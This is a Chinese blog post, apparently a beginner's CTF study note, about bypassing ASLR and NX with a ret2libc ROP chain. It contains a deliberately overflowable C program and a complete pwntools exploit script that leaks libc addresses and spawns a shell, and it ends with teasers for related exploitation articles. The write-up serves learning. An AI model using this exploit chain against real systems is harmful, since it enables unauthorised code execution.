栈溢出基本ROP绕过ASLR和NX保护

最新推荐文章于 2023-01-15 22:40:44 发布
最新推荐文章于 2023-01-15 22:40:44 发布
阅读量3.5k 收藏 12
点赞数 2
分类专栏: pwn pwn 学习之路 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85323020
版权

菜鸡刚学rop,总结下。

笔记中的程序源代码来自 蒸米大佬的x86一步一步学rop http://www.vuln.cn/6645
计算溢出点的位置的脚本可以在大佬的github上下载(其实从IDA上也可以计算出来溢出点)
https://github.com/zhengmin1989/ROP_STEP_BY_STEP

预备知识:
了解动态链接中PLT表和GOT表以及延迟绑定技术。
ASLR的开启无法通过checksec来检测,他的开启与系统有关。
ASLR只针对动态库基址的中间位数进行随机化,后三位并不会变。
ASLR不会随机化本身程序的基址。

在不开启PIE的情况下,可以使用ret2libc来绕过NX和ASLR保护。
下面是通用的利用思路:
这个思路是通解的思路,即不知道目标程序使用的动态库的版本。

  1. 同一个模块内,代码段和数据段之间的距离确定,不受随机化影响
  2. 同一动态库内,每个函数在动态库内部的偏移量是确定的
  3. 只要泄露出动态库中某个函数的地址,就可以知道该函数在动态库中的偏移。
  4. 不同动态库中相同函数的偏移量是不同的,那就可以通过这个泄露的偏移量确定该程序使用的动态库的版本。
  5. 计算出动态库的基址:
    动态库的基址=泄露的函数的地址 - 该函数在动态库中的偏移量
  6. 计算出system函数的地址:
    system函数的地址= 动态库的基址 + system函数在动态库中的偏移量
  7. 找到 /bin/sh 这个字符串的所在位置,一般动态库里有这个字符串
    如果没有这个字符串就使用能写入的函数,将这个字符串读写到可写入的区域,这就需要构造ROP链,pop pop pop ret 。

这个样例是已知动态库的版本
样例的源代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

int main(int argc, char** argv) {
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}

在这里插入图片描述

编译时关闭canary和PIE防护,打开了ASLR和NX保护。
在这里插入图片描述在这里插入图片描述
此时动态库的基址是会发生变化的:
在这里插入图片描述

本题的利用思路就是用write函数,打印出write函数对应的got表里的内容。

(当然,不一定非要打印write函数的地址,只要打印got表中存在的函数的地址就可以计算出libc的基址)

虽然write函数的地址并不是固定的,但是程序本身使用过这个函数,所以PLT表里一定有这个函数,PLT表又属于本身程序的代码段,在没有开启PIE的情况下,write函数对应的PLT表项的地址是确定的。

同理GOT表项的地址也是不变的。GOT的地址不会变,变的只是GOT表项的内容。

则可以将返回地址覆盖为write函数对应的PLT表的地址,参数布置为,1,write函数对应的got表项的地址,4。

再将write函数的返回地址布置为vulnerable_function 这个函数的地址,执行完write函数后,返回到vulnerable_function函数,进行二次溢出,获得shell。

其中1是标准输出(即从终端显示输出结果),4是输出的长度。

其中write函数对应的PLT表项的地址可以在IDA中找到:
在这里插入图片描述
其对应的GOT表项地址也可以在IDA中找到:
在这里插入图片描述
覆盖前堆栈图如下:
在这里插入图片描述
覆盖后堆栈的情况如下:
在这里插入图片描述
打印出write 的地址后,计算出system函数的地址,然后利用二次栈溢出,覆盖返回地址为system函数地址,布置参数为/bin/sh 字符串的首地址。
/bin/sh 这个字符串也可以在libc中找到。

脚本没有用蒸米大佬的,蒸米大佬的使用ELF模块来直接获取write函数对应的PLT和GOT表项的地址,想看蒸米大佬的利用脚本,链接在笔记开始给了。我这里使用了最原始的方法。
利用脚本如下:

from pwn import*

libc=ELF("libc.so.6")

a=process("./a.out")

plt_write=p32(0x08048320)

vuln_addr=p32(0x08048456)

got_write=p32(0x0804A014)

payload='A'*140+plt_write+vuln_addr+p32(1)+got_write+p32(4)

a.send(payload)

write_addr=u32(a.recv(4))

libc_base=write_addr-libc.symbols["write"]

system_addr=libc_base+libc.symbols["system"]

binbash_addr=libc_base+next(libc.search("/bin/sh"))

payload='A'*140+p32(system_addr)+p32(1)+p32(binbash_addr)

a.send(payload)

a.interactive()

运行即可得到shell
在这里插入图片描述

dittozzz
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8221
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
栈溢出原理和绕过技术 | NX、CANARY、ASLR、RELRO
Sakura给爷pwn全场
12-16 837
GitHub: https://github.com/ylcangel/binary_vulnerability/
使用格式化字符串漏洞绕过Canary保护(32位ELF)萌新篇
最新发布
weixin_73481933的博客
01-15 448
当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。原理是在一个函数的入口,先从fs/gs寄存器中取出一个四字节(eax)或者八字节的rax的值存在栈上(最低位都是\x00),当函数结束是会检查这个栈上的值是否和存在去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序就会执行___stack_chk_fali函数,继而保护程序。32位文件,开启了NX和Canary保护
canary介绍与绕过技巧
0pt1mus
04-02 6454
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
linux内存布局和地址空间布局随机化(ASLR)下的可分配地址空间
RToax
07-08 1922
https://zsummer.github.io/2019/11/04/2019-11-04-aslr/ 地址空间布局随机化(ASLR) 《mmap的随机化》 《Meltdown(熔断漏洞)- Reading Kernel Memory from User Space/KASLR | 原文+中文翻译》 导语 64位下的linux地址空间虽然看起来虽然庞大2^64 但是实际上进行内核与用户空间的划分后, 包括ASLR以及PIE等机制的启用, 实际留给mmap和brk的可分配区域远远小于这个值, 大
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NXASLR
X丶 的博客
11-21 2207
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
总结来说,栈溢出漏洞的利用在开启NX的系统中更具挑战性,但通过ret2libc策略,攻击者仍然可以绕过这一防护。在没有ASLR的情况下,内存地址是可预测的,使得漏洞利用变得更加直接。然而,现代操作系统通常会同时启用...
栈溢出基础——ROP1.0的例题
07-13
不过,即使有NX保护,一些技巧如JOP(Jump-Oriented Programming)或SOP(System Call-Oriented Programming)仍可能被用来绕过它。 总之,了解栈溢出ROP技术对于网络安全研究和防护至关重要。通过解决“ROP1.0”...
缓冲区溢出——栈溢出
08-04
2. **栈保护技术**:如Canary、ASLR(地址空间布局随机化)、NX位(非执行页)等,它们可以增加攻击的难度,使攻击者难以精确控制程序执行流程。 3. **输入验证和过滤**:对用户输入进行严格的检查和过滤,确保其...
栈溢出入门到放弃_19_7_211
08-08
3. ROP (Return-Oriented Programming):在现代系统中,由于ASLRNX(非执行栈)保护,直接执行shellcode变得困难。ROP技术应运而生,它不依赖于大的shellcode,而是利用内存中已存在的小段可执行指令(称为...
pwn栈溢出10道练习题有writeup
01-04
在这种情况下,攻击者会利用栈上已存在的小片段(gadgets)构造逻辑,通过ROP绕过这些防护。 4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。...
Linux_x86下NXASLR绕过技术(续)
weixin_30809333的博客
11-03 250
四、Stack Canaries 首先看一下Stack Canaries演进历史: Stack Guard 是第一个使用 Canaries 探测的堆栈保护实现,它于 1997 年作为 GCC 的一个扩展发布。最初版本的 Stack Guard 使用 0x00000000 作为 canary word。尽管很多人建议把 Stack Guard 纳入 GCC,作为 GCC 的一部分来提供堆栈保护。...
ret2libc3_通过 ROP 绕过 DEP 和 ASLR 防护
Jc
05-08 769
题目:link > 2jfn 引 ROP的全称为 Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 常见的程序流劫持就是栈溢出,格式化字符串攻击和堆溢出。 通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的...
SEEDLAB漏洞分析Lab6缓冲区溢出2-绕开ASLR进行攻击
weixin_52590050的博客
04-16 3047
SEEDLAB漏洞挖掘Lab6缓冲区溢出2 SEEDLAB漏洞挖掘Lab6缓冲区溢出2 Task1:stackesp.c 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法;
栈溢出学习(五)之NXASLR绕过方法
Pz_mstr's Blog
03-29 3732
前言 栈溢出学习(五)之NXASLR绕过方法,讲述NXASLR保护机制及其绕过方法 系列文章 栈溢出学习(一)之利用预留后门 & return2shellcode 栈溢出学习(二)之 jmp esp & return2libc 栈溢出学习(三)之简单ROP 栈溢出学习(四)之Hijack GOT 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下...
linux栈溢出4-绕过ROPASLR(不知道libc.so)
小强的博客
07-31 1168
调试环境是ubuntu14 32位 这次开启了DEP、ASLR(不知道libc.so情况下) 还是参考了《一步一步学ROP之linux_x64篇》这篇文章。 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf
[pwn]ROP绕过ASLR&NX
热门推荐
Breeze的博客
05-27 1万+
# [详细] ROP绕过ASLR&NX 这次使用的程序是Defcon - 2015初赛题目,r0pbaby,也是一道经典的pwn题目了。 NX策略是指在栈中的代码不会被执行,ASLR是使共享库的装载位置随机化不可预测。 信息搜集 首先查看是64位还是32位文件: 然后查看安全策略: 可见开启了NX和PIE,PIE也就是ASLR。然后在IDA中查看伪代码,无需详细阅读,直接找溢出函数即...
linux栈溢出-绕过ROPASLR(知道libc.so)
小强的博客
07-28 1597
调试环境是ubuntu14 32位 这次开启了DEP、ASLR,在linux x86溢出,知道libc.so文件的情况下 代码是1.c: #include #include #include void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256); } int main(i
DEP/ASLR 原理及攻击
forevertingting的博客
08-10 4536
ASLR DEP
二进制漏洞挖掘-栈溢出-开启NX开启ASLR1
08-04
本文将详细介绍二进制漏洞挖掘中的栈溢出漏洞,特别是开启NXASLR的影响。 一、栈溢出漏洞原理 栈溢出漏洞是由于程序在对栈缓冲区进行写操作时,未对缓冲区大小进行判断,导致写入数据长度可能大于缓冲区长度,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值